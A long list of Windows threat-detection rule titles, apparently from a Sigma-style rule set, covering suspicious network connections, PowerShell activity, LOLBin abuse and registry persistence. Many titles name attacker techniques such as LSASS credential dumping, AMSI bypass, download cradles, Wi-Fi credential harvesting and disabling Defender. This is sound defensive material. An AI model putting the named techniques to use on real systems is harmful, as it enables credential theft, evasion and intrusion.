  • Network Connection Initiated To Cloudflared Tunnels Domains
  • Network Connection Initiated To DevTunnels Domain
  • Suspicious Network Connection to IP Lookup Service APIs
  • Suspicious Non-Browser Network Communication With Google API
  • Network Communication Initiated To Portmap.IO Domain
  • Suspicious Non-Browser Network Communication With Telegram API
  • Network Connection Initiated To Visual Studio Code Tunnels Domain
  • Office Application Initiated Network Connection To Non-Local IP
  • Office Application Initiated Network Connection Over Uncommon Ports
  • Python Initiated Connection
  • RegAsm.EXE Initiating Network Connection To Public IP
  • Remote Access Tool - AnyDesk Incoming Connection
  • Network Connection Initiated By Regsvr32.EXE
  • Microsoft Sync Center Suspicious Network Connections
  • Rundll32 Internet Connection
  • Uncommon Outbound Kerberos Connection
  • Communication To Uncommon Destination Ports
  • Outbound Network Connection To Public IP Via Winlogon
  • Suspicious Outbound SMTP Connections
  • ADFS Database Named Pipe Connection By Uncommon Tool
  • Suspicious Wordpad Outbound Connections
  • Potentially Suspicious Wuauclt Network Connection
  • Local Network Connection Initiated By Script Interpreter
  • Alternate PowerShell Hosts Pipe
  • PUA - CSExec Default Named Pipe
  • PUA - PAExec Default Named Pipe
  • PUA - RemCom Default Named Pipe
  • WMI Event Consumer Created Named Pipe
  • Nslookup PowerShell Download Cradle
  • PsExec Tool Execution From Suspicious Locations - PipeName
  • PowerShell Downgrade Attack - PowerShell
  • Netcat The Powershell Version
  • Suspicious PowerShell Download
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell
  • Suspicious Non PowerShell WSMAN COM Provider
  • Potential Active Directory Enumeration Using AD Module - PsModule
  • Alternate PowerShell Hosts - PowerShell Module
  • Clear PowerShell History - PowerShell Module
  • PowerShell Get Clipboard
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module
  • Suspicious PowerShell Download - PoshModule
  • Suspicious Computer Machine Password by PowerShell
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell Module
  • SyncAppvPublishingServer Bypass Powershell Restriction - PS Module
  • Access to Browser Login Data
  • Potential Active Directory Enumeration Using AD Module - PsScript
  • Add Windows Capability Via PowerShell Script
  • Potential AMSI Bypass Script Using NULL Bits
  • Get-ADUser Enumeration Using UserAccountControl Flags
  • Potential Data Exfiltration Via Audio File
  • Automated Collection Command PowerShell
  • Windows Screen Capture with CopyFromScreen
  • Clear PowerShell History - PowerShell
  • Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell
  • Powershell Create Scheduled Task
  • Registry-Free Process Scope COR_PROFILER
  • PowerShell Create Local User
  • Powershell Detect Virtualization Environment
  • DirectorySearcher Powershell Exploitation
  • Manipulation of User Computer or Group Security Principals Across AD
  • Potential In-Memory Execution Using Reflection.Assembly
  • Potential COM Objects Download Cradles Usage - PS Script
  • Dump Credentials from Windows Credential Manager With PowerShell
  • Enable Windows Remote Management
  • Potential Suspicious Windows Feature Enabled
  • Enumerate Credentials from Windows Credential Manager With PowerShell
  • Suspicious PowerShell Mailbox SMTP Forward Rule
  • Certificate Exported Via PowerShell - ScriptBlock
  • Suspicious FromBase64String Usage On Gzip Archive - Ps Script
  • Service Registry Permissions Weakness Check
  • Suspicious Get-ADReplAccount
  • Security Software Discovery Via Powershell Script
  • PowerShell Hotfix Enumeration
  • PowerShell ICMP Exfiltration
  • Import PowerShell Modules From Suspicious Directories
  • Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript
  • Execute Invoke-command on Remote Host
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell
  • Powershell Keylogging
  • Powershell LocalAccount Manipulation
  • Malicious PowerShell Keywords
  • Modify Group Policy Settings - ScriptBlockLogging
  • Powershell MsXml COM Object
  • Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock
  • PowerShell Remote Session Creation
  • PowerShell Script With File Hostname Resolving Capabilities
  • Root Certificate Installed - PowerShell
  • Suspicious Invoke-Item From Mount-DiskImage
  • Powershell Sensitive File Discovery
  • Change PowerShell Policies to an Insecure Level - PowerShell
  • Detected Windows Software Discovery - PowerShell
  • Powershell Store File In Alternate Data Stream
  • Suspicious Eventlog Clear
  • Powershell Directory Enumeration
  • Suspicious PowerShell Download - Powershell Script
  • Powershell Execute Batch Script
  • Troubleshooting Pack Cmdlet Execution
  • Extracting Information with PowerShell
  • Suspicious GetTypeFromCLSID ShellExecute
  • Suspicious Hyper-V Cmdlets
  • Suspicious IO.FileStream
  • Change User Agents with WebRequest
  • Potential Keylogger Activity
  • Potential Suspicious PowerShell Keywords
  • Powershell Local Email Collection
  • PowerShell Deleted Mounted Share
  • Suspicious New-PSDrive to Admin Share
  • Suspicious TCP Tunnel Via PowerShell Script
  • Recon Information for Export with PowerShell
  • Remove Account From Domain Admin Group
  • Suspicious Start-Process PassThru
  • Suspicious Unblock-File
  • Suspicious PowerShell WindowStyle Option
  • PowerShell Write-EventLog Usage
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell Script
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction
  • Testing Usage of Uncommonly Used Port
  • Powershell Timestomp
  • User Discovery And Export Via Get-ADUser Cmdlet - PowerShell
  • Potential Persistence Via PowerShell User Profile Using Add-Content
  • Usage Of Web Request Commands And Cmdlets - ScriptBlock
  • Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript
  • PowerShell WMI Win32_Product Install MSI
  • Windows Firewall Profile Disabled
  • Winlogon Helper DLL
  • Windows Defender Exclusions Added - PowerShell
  • Powershell WMI Persistence
  • WMIC Unquoted Services Path Lookup - PowerShell
  • Suspicious X509Enrollment - Ps Script
  • Powershell XML Execute Command
  • Potential Credential Dumping Activity Via LSASS
  • Potentially Suspicious GrantedAccess Flags On LSASS
  • Potential Direct Syscall of NtOpenProcess
  • Function Call From Undocumented COM Interface EditionUpgradeManager
  • Compress Data and Lock With Password for Exfiltration With 7-ZIP
  • 7Zip Compressing Dump Files
  • Potential DLL Injection Via AccCheckConsole
  • Uncommon Child Process Of AddinUtil.EXE
  • Uncommon AddinUtil.EXE CommandLine Execution
  • AddinUtil.EXE Execution From Uncommon Directory
  • AgentExecutor PowerShell Execution
  • Uncommon Child Process Of Appvlp.EXE
  • AspNetCompiler Execution
  • Uncommon Assistive Technology Applications Execution Via AtBroker.EXE
  • Hiding Files with Attrib.exe
  • Indirect Inline Command Execution Via Bash.EXE
  • Indirect Command Execution From Script File Via Bash.EXE
  • Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE
  • Data Export From MSSQL Table Via BCP.EXE
  • Uncommon Child Process Of BgInfo.EXE
  • File Download Via Bitsadmin
  • File Download Via Bitsadmin To An Uncommon Target Folder
  • Monitoring For Persistence Via BITS
  • Browser Execution In Headless Mode
  • Chromium Browser Instance Executed With Custom Extension
  • File Download From Browser Process Via Inline URL
  • Browser Started with Remote Debugging
  • Potential Binary Proxy Execution Via Cdb.EXE
  • New Root Certificate Installed Via CertMgr.EXE
  • File Download via CertOC.EXE
  • DLL Loaded via CertOC.EXE
  • New Root Certificate Installed Via Certutil.EXE
  • File Decoded From Base64/Hex Via Certutil.EXE
  • Suspicious Download Via Certutil.EXE
  • File Encoded To Base64 Via Certutil.EXE
  • Certificate Exported Via Certutil.EXE
  • Suspicious CodePage Switch Via CHCP
  • Console CodePage Lookup Via CHCP
  • Deleted Data Overwritten Via Cipher.EXE
  • Cloudflared Portable Execution
  • Cloudflared Quick Tunnel Execution
  • Cloudflared Tunnel Connections Cleanup
  • Cloudflared Tunnel Execution
  • New Generic Credentials Added Via Cmdkey.EXE
  • Potential Arbitrary File Download Via Cmdl32.EXE
  • Greedy File Deletion Using Del
  • Potential Dosfuscation Activity
  • Command Line Execution with Suspicious URL and AppData Strings
  • Potentially Suspicious Ping/Copy Command Combination
  • Potentially Suspicious CMD Shell Output Redirect
  • Read Contents From Stdin Via Cmd.EXE
  • Potential Download/Upload Activity Using Type Command
  • Unusual Parent Process For Cmd.EXE
  • Arbitrary File Download Via ConfigSecurityPolicy.EXE
  • Powershell Executed From Headless ConHost Process
  • Uncommon Child Process Of Conhost.EXE
  • Conhost Spawned By Uncommon Parent Process
  • Dynamic .NET Compilation Via Csc.EXE
  • Suspicious Csi.exe Usage
  • Active Directory Structure Export Via Csvde.EXE
  • Potential Cookies Session Hijacking
  • Curl Web Request With Potential Custom User-Agent
  • File Download From IP URL Via Curl.EXE
  • Insecure Transfer Via Curl.EXE
  • Insecure Proxy/DOH Transfer Via Curl.EXE
  • Local File Read Using Curl.EXE
  • Uncommon Child Process Of Defaultpack.EXE
  • Remote File Download Via Desktopimgdownldr Utility
  • Potential DLL Sideloading Via DeviceEnroller.EXE
  • Potentially Suspicious Child Process Of ClickOnce Application
  • Arbitrary MSI Download Via Devinit.EXE
  • Potentially Suspicious Child Process Of DiskShadow.EXE
  • Diskshadow Script Mode - Uncommon Script Extension Execution
  • Diskshadow Script Mode - Execution From Potential Suspicious Location
  • Dism Remove Online Package
  • Potential Discovery Activity Via Dnscmd.EXE
  • Potential Application Whitelisting Bypass via Dnx.EXE
  • Process Memory Dump Via Dotnet-Dump
  • Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE
  • Binary Proxy Execution Via Dotnet-Trace.EXE
  • DriverQuery.EXE Execution
  • Potentially Over Permissive Permissions Granted Using Dsacls.EXE
  • Potential Password Spraying Attempt Using Dsacls.EXE
  • Domain Trust Discovery Via Dsquery
  • DumpMinitool Execution
  • New Capture Session Launched Via DXCap.EXE
  • Esentutl Gather Credentials
  • Esentutl Steals Browser Information
  • Potentially Suspicious Cabinet File Expansion
  • Explorer Process Tree Break
  • Remote File Download Via Findstr.EXE
  • Findstr Launching .lnk File
  • Recon Command Output Piped To Findstr.EXE
  • Permission Misconfiguration Reconnaissance Via Findstr.EXE
  • Security Tools Keyword Lookup Via Findstr.EXE
  • Filter Driver Unloaded Via Fltmc.EXE
  • Forfiles Command Execution
  • Use of FSharp Interpreters
  • Fsutil Behavior Set SymlinkEvaluation
  • Potential Arbitrary Command Execution Via FTP.EXE
  • Arbitrary File Download Via GfxDownloadWrapper.EXE
  • Suspicious Git Clone
  • File Decryption Using Gpg4win
  • File Encryption Using Gpg4win
  • Portable Gpg.EXE Execution
  • Arbitrary Binary Execution Using GUP Utility
  • Gpresult Display Group Policy Information
  • HackTool - WinRM Access Via Evil-WinRM
  • HackTool - Impersonate Execution
  • Invoke-Obfuscation COMPRESS OBFUSCATION
  • HackTool - Jlaive In-Memory Assembly Execution
  • HackTool - LaZagne Execution
  • HackTool - SharpLDAPmonitor Execution
  • Suspicious ZipExec Execution
  • Potential Fake Instance Of Hxtsr.EXE Executed
  • Use Icacls to Hide File to Everyone
  • IIS Native-Code Module Command Line Installation
  • Suspicious IIS URL GlobalRules Rewrite Via AppCmd
  • C# IL Code Compilation Via Ilasm.EXE
  • InfDefaultInstall.exe .inf Execution
  • File Download Via InstallUtil.EXE
  • Suspicious Execution of InstallUtil Without Log
  • Java Running with Remote Debugging
  • Shell Process Spawned by Java.EXE
  • Suspicious SysAidServer Child
  • Windows Kernel Debugger Execution
  • Computer Password Change Via Ksetup.EXE
  • Potentially Suspicious Child Process of KeyScrambler.exe
  • Active Directory Structure Export Via Ldifde.EXE
  • Logged-On User Password Change Via Ksetup.EXE
  • Import LDAP Data Interchange Format File Via Ldifde.EXE
  • Uncommon Link.EXE Parent Process
  • Rebuild Performance Counter Values Via Lodctr.EXE
  • Suspicious CustomShellHost Execution
  • LOLBAS Data Exfiltration by DataSvcUtil.exe
  • DeviceCredentialDeployment Execution
  • Suspicious Diantz Alternate Data Stream Execution
  • Suspicious Diantz Download and Compress Into a CAB File
  • Suspicious Extrac32 Execution
  • Suspicious Extrac32 Alternate Data Stream Execution
  • Potential Reconnaissance Activity Via GatherNetworkInfo.VBS
  • Gpscript Execution
  • Ie4uinit Lolbin Use From Invalid Path
  • Launch-VsDevShell.PS1 Proxy Execution
  • Execute Files with Msdeploy.exe
  • Use of OpenConsole
  • Use of Pcalua For Execution
  • Code Execution via Pcwutl.dll
  • Execute Code with Pester.bat as Parent
  • Execute Code with Pester.bat
  • Pubprn.vbs Proxy Execution
  • DLL Execution via Rasautou.exe
  • REGISTER_APP.VBS Proxy Execution
  • Use of Remote.exe
  • Replace.exe Usage
  • Lolbin Runexehelper Use As Proxy
  • Suspicious Runscripthelper.exe
  • Use of Scriptrunner.exe
  • Use Of The SFTP.EXE Binary As A LOLBIN
  • Suspicious Driver Install by pnputil.exe
  • Dumping Process via Sqldumper.exe
  • SyncAppvPublishingServer Execute Arbitrary PowerShell Code
  • SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code
  • Potential DLL Injection Or Execution Using Tracker.exe
  • Use of TTDInject.exe
  • Lolbin Unregmp2.exe Use As Proxy
  • UtilityFunctions.ps1 Proxy Dll
  • Use of VisualUiaVerifyNative.exe
  • Use of VSIISExeLauncher.exe
  • Use of Wfc.exe
  • Potential Register_App.Vbs LOLScript Abuse
  • Potential Mftrace.EXE Abuse
  • CodePage Modification Via MODE.COM To Russian Language
  • Suspicious Msbuild Execution By Uncommon Parent Process
  • Suspicious Cabinet File Execution Via Msdt.EXE
  • Arbitrary File Download Via MSEDGE_PROXY.EXE
  • Wscript Shell Run In CommandLine
  • DllUnregisterServer Function Call Via Msiexec.EXE
  • Suspicious MsiExec Embedding Parent
  • Suspicious Msiexec Execute Arbitrary DLL
  • Msiexec Quiet Installation
  • Suspicious Msiexec Quiet Install From Remote Location
  • MsiExec Web Install
  • Arbitrary File Download Via MSOHTMED.EXE
  • Arbitrary File Download Via MSPUB.EXE
  • Detection of PowerShell Execution via Sqlps.exe
  • SQL Client Tools PowerShell Session Detection
  • New Remote Desktop Connection Initiated Via Mstsc.EXE
  • Msxsl.EXE Execution
  • New Firewall Rule Added Via Netsh.EXE
  • Firewall Rule Deleted Via Netsh.EXE
  • Firewall Disabled via Netsh.EXE
  • Netsh Allow Group Policy on Microsoft Defender Firewall
  • Firewall Rule Update Via Netsh.EXE
  • Potential Persistence Via Netsh Helper DLL
  • New Network Trace Capture Started Via Netsh.EXE
  • New Port Forwarding Rule Added Via Netsh.EXE
  • Harvesting Of Wifi Credentials Via Netsh.EXE
  • Suspicious Group And Account Reconnaissance Activity Using Net.EXE
  • New User Created Via Net.EXE
  • Windows Admin Share Mount Via Net.EXE
  • Password Provided In Command Line Of Net.EXE
  • Potential Recon Activity Via Nltest.EXE
  • Node Process Executions
  • Nslookup PowerShell Download Cradle - ProcessCreation
  • Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)
  • Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)
  • Driver/DLL Installation Via Odbcconf.EXE
  • New DLL Registered Via Odbcconf.EXE
  • Response File Execution Via Odbcconf.EXE
  • Uncommon Child Process Spawned By Odbcconf.EXE
  • Potential Arbitrary DLL Load Using Winword
  • Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution
  • PDQ Deploy Remote Administration Tool Execution
  • Potentially Suspicious Execution Of PDQDeployRunner
  • Perl Inline Command Execution
  • Php Inline Command Execution
  • PktMon.EXE Execution
  • Suspicious Powercfg Execution To Change Lock Screen Timeout
  • Potential Active Directory Enumeration Using AD Module - ProcCreation
  • Add Windows Capability Via PowerShell Cmdlet
  • Potential AMSI Bypass Using NULL Bits
  • Audio Capture via PowerShell
  • Potential Process Execution Proxy Via CL_Invocation.ps1
  • Assembly Loading Via CL_LoadAssembly.ps1
  • Potential Script Proxy Execution Via CL_Mutexverifiers.ps1
  • ConvertTo-SecureString Cmdlet Usage Via CommandLine
  • Computer Discovery And Export Via Get-ADComputer Cmdlet
  • Gzip Archive Decode Via PowerShell
  • Powershell Defender Exclusion
  • Windows Firewall Disabled via PowerShell
  • Potential PowerShell Downgrade Attack
  • Potential COM Objects Download Cradles Usage - Process Creation
  • PowerShell Web Download
  • Potential DLL File Download Via PowerShell Invoke-WebRequest
  • PowerShell Download Pattern
  • Potential Suspicious Windows Feature Enabled - ProcCreation
  • Suspicious Execution of Powershell with Base64
  • Powershell Inline Execution From A File
  • Certificate Exported Via PowerShell
  • Suspicious FromBase64String Usage On Gzip Archive - Process Creation
  • Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet
  • PowerShell Get-Clipboard Cmdlet Via CLI
  • Import PowerShell Modules From Suspicious Directories - ProcCreation
  • Unsigned AppX Installation Attempt Using Add-AppxPackage
  • Suspicious PowerShell Invocations - Specific - ProcessCreation
  • Suspicious Invoke-WebRequest Execution With DirectIP
  • MSExchange Transport Agent Installation
  • Suspicious PowerShell Invocation From Script Engines
  • Change PowerShell Policies to an Insecure Level
  • Service StartupType Change Via PowerShell Set-Service
  • PowerShell Script Run in AppData
  • User Discovery And Export Via Get-ADUser Cmdlet
  • Suspicious X509Enrollment - Process Creation
  • Suspicious XOR Encoded PowerShell Command
  • Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
  • Arbitrary File Download Via PresentationHost.EXE
  • XBAP Execution From Uncommon Locations Via PresentationHost.EXE
  • Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution
  • Abusing Print Executable
  • File Download Using ProtocolHandler.exe
  • Potential Provlaunch.EXE Binary Proxy Execution Abuse
  • Screen Capture Activity Via Psr.EXE
  • PUA - AdvancedRun Execution
  • PUA - Advanced IP Scanner Execution
  • PUA - Advanced Port Scanner Execution
  • PUA - Mouse Lock Execution
  • PUA - SoftPerfect Netscan Execution
  • PUA - NirCmd Execution
  • PUA - Nmap/Zenmap Execution
  • PUA - PingCastle Execution
  • PUA - Process Hacker Execution
  • PUA - Radmin Viewer Utility Execution
  • PUA - Potential PE Metadata Tamper Using Rcedit
  • PUA - System Informer Execution
  • PUA - WebBrowserPassView Execution
  • Python Inline Command Execution
  • Potentially Suspicious Usage Of Qemu
  • Query Usage To Exfil Data
  • Suspicious RASdial Activity
  • Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension
  • Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
  • Imports Registry Key From a File
  • DLL Execution Via Register-cimprovider.exe
  • Enumeration for 3rd Party Creds From CLI
  • Hiding User Account Via SpecialAccounts Registry Key - CommandLine
  • Persistence Via TypedPaths - CommandLine
  • Potential Regsvr32 Commandline Flag Anomaly
  • Potentially Suspicious Regsvr32 HTTP/FTP Pattern
  • Regsvr32 Execution From Potential Suspicious Location
  • Scripting/CommandLine Process Spawned Regsvr32
  • Regsvr32 DLL Execution With Uncommon Extension
  • Potential Persistence Attempt Via Run Keys Using Reg.EXE
  • Dropping Of Password Filter DLL
  • Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
  • Potentially Suspicious Desktop Background Change Using Reg.EXE
  • Direct Autorun Keys Modification
  • Windows Recall Feature Enabled Via Reg.EXE
  • Potential Suspicious Registry File Imported Via Reg.EXE
  • Modify Group Policy Settings
  • Suspicious Reg Add Open Command
  • Enumeration for Credentials in Registry
  • Detected Windows Software Discovery
  • Potential Configuration And Service Reconnaissance Via Reg.EXE
  • Suspicious ScreenSave Change by Reg.exe
  • Changing Existing Service ImagePath Value Via Reg.EXE
  • Write Protect For Storage Disabled
  • Remote Access Tool - AnyDesk Execution
  • Remote Access Tool - AnyDesk Piped Password Via CLI
  • Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate
  • Remote Access Tool - RURAT Execution From Unusual Location
  • Remote Access Tool - MeshAgent Command Execution via MeshCentral
  • Remote Access Tool - NetSupport Execution
  • Remote Access Tool - NetSupport Execution From Unusual Location
  • Remote Access Tool - GoToAssist Execution
  • Remote Access Tool - LogMeIn Execution
  • Remote Access Tool - ScreenConnect Execution
  • Remote Access Tool - ScreenConnect Installation Execution
  • Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution
  • Remote Access Tool - Simple Help Execution
  • Remote Access Tool - UltraViewer Execution
  • Renamed AutoHotkey.EXE Execution
  • Potential Defense Evasion Via Binary Rename
  • Renamed BOINC Client Execution
  • Renamed CURL.EXE Execution
  • Renamed FTP.EXE Execution
  • Renamed Microsoft Teams Execution
  • Visual Studio NodejsTools PressAnyKey Renamed Execution
  • Renamed Remote Utilities RAT (RURAT) Execution
  • Capture Credentials with Rpcping.exe
  • Ruby Inline Command Execution
  • Rundll32 InstallScreenSaver Execution
  • Potential Obfuscated Ordinal Call Via Rundll32
  • Rundll32 Spawned Via Explorer.EXE
  • Suspicious Process Start Locations
  • Suspicious Rundll32 Setupapi.dll Activity
  • Potential ShellDispatch.DLL Functionality Abuse
  • Potentially Suspicious Rundll32 Activity
  • Potentially Suspicious Rundll32.EXE Execution of UDL File
  • Rundll32 Execution With Uncommon DLL Extension
  • Suspicious Workstation Locking via Rundll32
  • WebDav Client Execution Via Rundll32.EXE
  • Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
  • Suspicious Scheduled Task Name As GUID
  • Potential Persistence Via Microsoft Compatibility Appraiser
  • Scheduled Task Executing Payload from Registry
  • Suspicious Schtasks Schedule Type With High Privileges
  • Suspicious Scheduled Task Creation via Masqueraded XML File
  • Service StartupType Change Via Sc.EXE
  • New Kernel Driver Via SC.EXE
  • Service Security Descriptor Tampering Via Sc.EXE
  • Potential Persistence Attempt Via Existing Service Tampering
  • Potential Shim Database Persistence via Sdbinst.EXE
  • Uncommon Extension Shim Database Installation Via Sdbinst.EXE
  • Sdclt Child Processes
  • Potential Suspicious Activity Using SeCEdit
  • Potential SPN Enumeration Via Setspn.EXE
  • Setup16.EXE Execution With Custom .Lst File
  • Suspicious Execution of Shutdown
  • Suspicious Execution of Shutdown to Log Out
  • Uncommon Sigverif.EXE Child Process
  • Uncommon Child Processes Of SndVol.exe
  • Audio Capture via SoundRecorder
  • Veeam Backup Database Suspicious Query
  • Arbitrary File Download Via Squirrel.EXE
  • Process Proxy Execution Via Squirrel.EXE
  • Port Forwarding Activity Via SSH.EXE
  • Program Executed Using Proxy/Local Command Via SSH.EXE
  • Potential Amazon SSM Agent Hijacking
  • Start of NT Virtual DOS Machine
  • User Added to Local Administrators Group
  • Execute From Alternate Data Streams
  • Always Install Elevated Windows Installer
  • Potentially Suspicious Windows App Activity
  • Arbitrary Shell Command Execution Via Settingcontent-Ms
  • Automated Collection Command Prompt
  • Potential Suspicious Browser Launch From Document Reader Process
  • Potential Browser Data Stealing
  • Potential Commandline Obfuscation Using Escape Characters
  • Potential Command Line Path Traversal Evasion Attempt
  • Suspicious Copy From or To System Directory
  • Copy From Or To Admin Share Or Sysvol Folder
  • Always Install Elevated MSI Spawned Cmd And Powershell
  • Suspicious Electron Application Child Processes
  • Potentially Suspicious Electron Application CommandLine
  • Elevated System Shell Spawned From Uncommon Parent Location
  • Hidden Powershell in Link File Pattern
  • Potentially Suspicious EventLog Recon Activity Using Log Query Utilities
  • Suspicious File Characteristics Due to Missing Fields
  • Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI
  • Writing Of Malicious Files To The Fonts Folder
  • Potential Homoglyph Attack Using Lookalike Characters
  • Potentially Suspicious JWT Token Search Via CLI
  • LOLBIN Execution From Abnormal Drive
  • Potential File Download Via MS-AppInstaller Protocol Handler
  • Suspicious Scan Loop Network
  • Potential Network Sniffing Activity Using Network Tools
  • Execution of Suspicious File Type Extension
  • Process Launched Without Image Name
  • Use Short Name Path in Command Line
  • Use Short Name Path in Image
  • Use NTFS Short Name in Command Line
  • Use NTFS Short Name in Image
  • Obfuscated IP Download Activity
  • Obfuscated IP Via CLI
  • Private Keys Reconnaissance Via CommandLine Tools
  • Suspicious RunAs-Like Flag Combination
  • Recon Information for Export with Command Prompt
  • Potential Remote Desktop Tunneling
  • Shadow Copies Creation Using Operating Systems Utilities
  • Suspicious SYSVOL Domain Group Policy Access
  • Process Creation Using Sysnative Folder
  • Suspicious Userinit Child Process
  • Malicious PE Execution by Microsoft Visual Studio Debugger
  • Weak or Abused Passwords In CLI
  • Usage Of Web Request Commands And Cmdlets
  • Uncommon Svchost Parent Process
  • Permission Check Via Accesschk.EXE
  • Active Directory Database Snapshot Via ADExplorer
  • Potential Memory Dumping Activity Via LiveKD
  • Procdump Execution
  • Psexec Execution
  • PsExec Service Execution
  • Suspicious Use of PsLogList
  • Sysinternals PsService Execution
  • Sysinternals PsSuspend Execution
  • Sysmon Configuration Update
  • Potential Binary Impersonating Sysinternals Tools
  • Sysprep on AppData Folder
  • Suspicious Recursive Takeown
  • Tap Installer Execution
  • Loaded Module Enumeration Via Tasklist.EXE
  • Potentially Suspicious Command Targeting Teams Sensitive Files
  • New Virtual Smart Card Created Via TpmVscMgr.EXE
  • Potential RDP Session Hijacking Activity
  • UAC Bypass via Windows Firewall Snap-In Hijack
  • Potential UAC Bypass Via Sdclt.EXE
  • Use of UltraVNC Remote Access Software
  • Windows Credential Manager Access via VaultCmd
  • Verclsid.exe Runs COM Object
  • Suspicious VBoxDrvInst.exe Parameters
  • Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
  • Potentially Suspicious Child Process Of VsCode
  • Visual Studio Code Tunnel Execution
  • Visual Studio Code Tunnel Shell Execution
  • Visual Studio Code Tunnel Service Installation
  • Potential Binary Proxy Execution Via VSDiagnostics.EXE
  • Suspicious Vsls-Agent Command With AgentExtensionPath Load
  • Windows Backup Deleted Via Wbadmin.EXE
  • File Recovery From Backup Via Wbadmin.EXE
  • Potentially Suspicious WebDAV LNK Execution
  • Potential ReflectDebugger Content Execution Via WerFault.EXE
  • Enumerate All Information With Whoami.EXE
  • Group Membership Reconnaissance Via Whoami.EXE
  • Whoami.EXE Execution With Output Option
  • Whoami.EXE Execution Anomaly
  • Suspicious WindowsTerminal Child Processes
  • Add New Download Source To Winget
  • Add Potential Suspicious New Download Source To Winget
  • Install New Package Via Winget Local Manifest
  • Winrar Compressing Dump Files
  • Potentially Suspicious Child Process Of WinRAR.EXE
  • Winrar Execution in Non-Standard Folder
  • AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl
  • Remote Code Execute via Winrm.vbs
  • Remote PowerShell Session Host Process (WinRM)
  • Compress Data and Lock With Password for Exfiltration With WINZIP
  • Wlrmdr.EXE Uncommon Argument Or Child Process
  • New Process Created Via Wmic.EXE
  • Computer System Reconnaissance Via Wmic.EXE
  • Hardware Model Reconnaissance Via Wmic.EXE
  • Windows Hotfix Updates Reconnaissance Via Wmic.EXE
  • Process Reconnaissance Via Wmic.EXE
  • Potential Product Reconnaissance Via Wmic.EXE
  • Potential Product Class Reconnaissance Via Wmic.EXE
  • Service Reconnaissance Via Wmic.EXE
  • Uncommon System Information Discovery Via Wmic.EXE
  • Potential Unquoted Service Path Reconnaissance Via Wmic.EXE
  • System Disk And Volume Reconnaissance Via Wmic.EXE
  • WMIC Remote Command Execution
  • Service Started/Stopped Via Wmic.EXE
  • Potential SquiblyTwo Technique Execution
  • Application Terminated Via Wmic.EXE
  • Application Removed Via Wmic.EXE
  • XSL Script Execution Via WMIC.EXE
  • WmiPrvSE Spawned A Process
  • Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell
  • WMI Persistence - Script Event Consumer
  • Potential Dropper Script Execution Via WScript/CScript
  • Cscript/Wscript Potentially Suspicious Child Process
  • WSL Child Process Anomaly
  • Windows Binary Executed From WSL
  • COM Object Execution via Xwizard.EXE
  • Potential Process Hollowing Activity
  • Potential COM Object Hijacking Via TreatAs Subkey - Registry
  • Potential Persistence Via Disk Cleanup Handler - Registry
  • Potential Persistence Via Logon Scripts - Registry
  • PUA - Sysinternals Tools Execution - Registry
  • Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted
  • Removal of Potential COM Hijacking Registry Keys
  • Removal Of Index Value to Hide Schedule Task - Registry
  • Removal Of SD Value to Hide Schedule Task - Registry
  • Path To Screensaver Binary Modified
  • New DLL Added to AppCertDlls Registry Key
  • New DLL Added to AppInit_DLLs Registry Key
  • Office Application Startup - Office Test
  • Windows Registry Trust Record Modification
  • New PortProxy Registry Entry Added
  • Run Once Task Configuration in Registry
  • Atbroker Registry Change
  • Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback
  • Add Port Monitor Persistence in Registry
  • Add Debugger Entry To AeDebug For Persistence
  • Allow RDP Remote Assistance Feature
  • CurrentVersion Autorun Keys Modification
  • Common Autorun Keys Modification
  • Classes Autorun Keys Modification
  • CurrentControlSet Autorun Keys Modification
  • CurrentVersion NT Autorun Keys Modification
  • Internet Explorer Autorun Keys Modification
  • Office Autorun Keys Modification
  • Session Manager Autorun Keys Modification
  • System Scripts Autorun Keys Modification
  • WinSock2 Autorun Keys Modification
  • Wow6432Node CurrentVersion Autorun Keys Modification
  • Wow6432Node Classes Autorun Keys Modification
  • New BgInfo.EXE Custom DB Path Registry Configuration
  • Wow6432Node Windows NT CurrentVersion Autorun Keys Modification
  • New BgInfo.EXE Custom WMI Query Registry Configuration
  • New BgInfo.EXE Custom VBScript Registry Configuration
  • IE Change Domain Zone
  • ClickOnce Trust Prompt Tampering
  • CrashControl CrashDump Disabled
  • Potential Registry Persistence Attempt Via DbgManagedDebugger
  • Windows Defender Exclusions Added - Registry
  • Potentially Suspicious Desktop Background Change Via Registry
  • Disable Exploit Guard Network Protection on Windows Defender
  • Disable Administrative Share Creation at Startup
  • Disable Tamper Protection on Windows Defender
  • Disable Microsoft Defender Firewall via Registry
  • Disable Internal Tools or Feature in Registry
  • Disable Privacy Settings Experience in Registry
  • Disable Windows Security Center Notifications
  • Disable Windows Firewall by Registry
  • Add DisallowRun Execution to Registry
  • Persistence Via Disk Cleanup Handler - Autorun
  • DNS-over-HTTPS Enabled by Registry
  • Periodic Backup For System Registry Hives Enabled
